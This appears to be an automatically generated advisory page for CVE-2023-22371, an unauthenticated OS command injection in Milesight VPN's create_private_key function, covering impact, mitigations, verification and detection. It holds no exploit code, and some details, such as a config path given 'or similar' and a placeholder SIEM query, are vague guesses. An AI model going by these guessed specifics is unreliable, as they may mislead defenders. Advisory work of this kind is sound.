CVE-2023-22371
📋 TL;DR
This CVE describes an OS command injection vulnerability in Milesight VPN's liburvpn.so library that allows remote attackers to execute arbitrary commands on affected systems. Attackers can exploit this by sending specially crafted network packets to trigger command execution. Organizations running vulnerable versions of Milesight VPN are affected.
💻 Affected Systems
- Milesight VPN
📦 What is this software?
Milesightvpn by Milesight
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with root/administrator privileges, allowing attackers to install malware, exfiltrate data, pivot to internal networks, or establish persistent backdoors.
Likely Case
Remote code execution leading to VPN server compromise, credential theft, network reconnaissance, and potential lateral movement within the network.
If Mitigated
Limited impact if network segmentation, strict firewall rules, and least privilege principles are implemented, potentially containing the attack to the VPN server.
🎯 Exploit Status
The vulnerability requires sending malicious network packets but does not require authentication. Exploitation complexity is low due to the nature of command injection vulnerabilities.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor for updated version
Vendor Advisory: https://www.milesight.com/security/
Restart Required: Yes
Instructions:
1. Check Milesight security advisory for patch availability. 2. Download and install the patched version from official vendor sources. 3. Restart the VPN service or system. 4. Verify the fix using verification steps below.
🔧 Temporary Workarounds
Network Segmentation and Firewall Rules
linuxRestrict network access to Milesight VPN service to only trusted IP addresses and networks.
iptables -A INPUT -p tcp --dport [VPN_PORT] -s [TRUSTED_IP] -j ACCEPT
iptables -A INPUT -p tcp --dport [VPN_PORT] -j DROP
Disable Vulnerable Functionality
allIf possible, disable or restrict the create_private_key functionality until patching can occur.
🧯 If You Can't Patch
- Implement strict network segmentation to isolate the VPN server from critical systems
- Deploy intrusion detection/prevention systems to monitor for exploit attempts and block malicious traffic
🔍 How to Verify
Check if Vulnerable:
Check if Milesight VPN version is 2.0.2. Review system logs for unusual command execution patterns or network traffic to the VPN service.Check Version:
Check Milesight VPN configuration files or administration interface for version information. Use: cat /etc/milesight/vpn/version.conf or similar.Verify Fix Applied:
Verify the installed version is updated beyond 2.0.2. Test that the create_private_key functionality no longer accepts malicious input by attempting safe validation tests.📡 Detection & Monitoring
Log Indicators:
- Unusual command execution in system logs
- Failed authentication attempts followed by command injection patterns
- Unexpected process creation from VPN service
Network Indicators:
- Malformed packets sent to VPN service port
- Unusual outbound connections from VPN server
- Command injection patterns in network traffic
SIEM Query:
source="vpn_logs" AND (command_injection OR "create_private_key" AND suspicious_pattern)